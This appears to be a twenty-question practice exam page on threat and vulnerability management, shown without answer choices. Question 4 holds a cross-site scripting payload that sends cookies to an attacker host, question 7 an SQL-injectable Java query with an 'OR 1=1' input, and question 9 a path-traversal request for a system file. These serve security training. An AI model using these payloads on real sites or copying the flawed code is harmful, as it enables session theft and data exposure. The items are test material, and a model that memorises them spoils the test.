Exam simulator: Threat and Vulnerability Management
Anastasia-Instructor August 31, 2022
Question 1 of 20
1. Question
In the cybersecurity and threat intelligence industries, there are several approaches used to analyze and track the characteristics of cyber intrusions by advanced threat actors. Which of the following approaches emphasizes the relationships and characteristics of four basic components: the adversary, capabilities, infrastructure, and victims?
Question 2 of 20
2. Question
While interpreting assessment reports in the Acunetix Vulnerability Scanner, you identified a vulnerability in the system with a Common Vulnerability Scoring System (CVSS) value of (L) and a score (0.395). Based on the given scenario, which of the following statements would be true?
Question 3 of 20
3. Question
You open the command prompt and type the following command to find out which ports on your system are open.
lsof -Pn -i4 | grep LISTEN
After typing the command you receive the following results.
127.0.0.1:22 (LISTEN)
127.0.0.1:53 (LISTEN)
127.0.0.1:68 (LISTEN)
127.0.0.1:25 (LISTEN)
Which of the following services are not currently running on your system? (Choose all that apply)
Question 4 of 20
4. Question
You have been hired as a security analyst to conduct a source code analysis on different websites. After spending hours determining whether the sites are compromised, you notice the following code snippet:
"http://www.client-website.com/search? < script >location.href='http://www.villainsite.com/hijacker.php?cookie='+document.cookie; < / script >"
Which of the following attacks is the attacker trying to conduct on your client’s website?
Question 5 of 20
5. Question
You just completed an HPING scan and received the following output:
HPING 4.2.2.1 (eth1 4.2.2.1): S set, 40 headers + 0 data bytes
len=46 ip=4.2.2.1 ttl=56 DF id=32839 sport=50 flags=RA seq=0 win=0 rtt=264.3 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32840 sport=51 flags=RA seq=1 win=0 rtt=277.6 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32841 sport=52 flags=RA seq=2 win=0 rtt=285.4 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32842 sport=53 flags=SA seq=3 win=49312 rtt=270.7 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32843 sport=54 flags=RA seq=4 win=0 rtt=225.1 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32844 sport=55 flags=RA seq=5 win=0 rtt=202.6 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32845 sport=56 flags=RA seq=6 win=0 rtt=196.7 ms
Based on these results, which of the following services returned a SYN-ACK?
Question 6 of 20
6. Question
Which of the following threat actor terms describes the act of breaking into a computer system for politically or socially motivated purposes?
Question 7 of 20
7. Question
The developer of your company wrote the following code snippet in Java to show the account numbers and balances for the current user's id as provided in a URL.
String accountBalanceQuery =
    "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = "
    + request.getParameter("user_id");
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBalanceQuery);
while (rs.next()) {
    page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance"));
}
Under normal operation, the user with ID 4 might be logged in, and visit the URL: https://mybank.ebanking/show_balances?user_id=4. This means that accountBalanceQuery would end up being:
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 4
A cyber security criminal changed the parameter 'user_id' to be interpreted as:
0 OR 1=1
When this query is passed to the database, it returns all the account numbers and balances it has stored, and rows are added to the page to show them. The attacker now knows every user's account numbers and balances. Which of the following attacks is conducted against the website?
Question 8 of 20
8. Question
The Internet of Things (IoT) is a network of physical objects that are embedded with sensors, software, and other technologies for the purpose of connecting and exchanging data with other devices and systems over the Internet. Which of the following statements is NOT considered an IoT threat and vulnerability?
Question 9 of 20
9. Question
Your company is using a web vulnerability scanner tool named Acunetix to check whether your website and web applications are vulnerable. While reviewing a scan report, you saw the following URL:
http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini HTTP/1.1
What type of attack is conducted on that website?
Question 10 of 20
10. Question
An organization has hired a cybersecurity analyst to conduct an assessment of its current wireless network security. He has been tasked with capturing the inbound and outbound packets and exporting the data to text files for further processing through third-party tools. Which of the following tools should the analyst use to complete the task?
Question 11 of 20
11. Question
You have been hired as a cybersecurity analyst to conduct an assessment against the organization’s network. Now you are in the process of trying to discover as many attack vectors as possible that can be used to exploit the systems further. Which of the following is the phase you are currently in?
Question 12 of 20
12. Question
In which of the following types of attack does an unauthorized user gain access to a system or network and remain there for an extended period of time without being detected, with the main goal of stealing data rather than causing damage to the network or system?
Question 13 of 20
13. Question
Your company has moved any workload from its on-premises environment to Amazon Web Services (AWS) to benefit from substantial IT cost savings, business agility, and operational resilience. You have been tasked with recommending a tool that enables security posture assessment of cloud environments. Which of the following tools should you recommend for completing the task?
Question 14 of 20
14. Question
You are working on an application with multiple serverless functions and your task is to deploy a REST API using Serverless, Express, and Node.js. Which of the following actions should you perform to ensure that a vulnerability in one function doesn't escalate and compromise others as well?
Question 15 of 20
15. Question
Which of the following tools are infrastructure vulnerability scanners? (Choose all that apply)
Question 16 of 20
16. Question
The developer of your company is writing software in the C language. As he is a junior software engineer, he needs your help to choose secure functions for his projects. Which of the following functions should he not use because it is considered an insecure function?
Question 17 of 20
17. Question
Which of the following monitoring solutions should you implement to get the most accurate and updated information about any vulnerabilities present in a given system?
Question 18 of 20
18. Question
A malicious user exploited a bug in a system and gained elevated access to resources that should normally be unavailable to him. Which type of attack was conducted in that system?
Question 19 of 20
19. Question
Active Vulnerability Scanners identify the active operating systems, applications, and ports throughout a network and provide information about weaknesses but they can’t take any action to resolve security problems. (True/False)
Question 20 of 20
20. Question
A telecom company may promise network availability of 99.999 percent and allow the customer to reduce their payment by a given percentage if that is not achieved. Which of the following agreements is described in this example?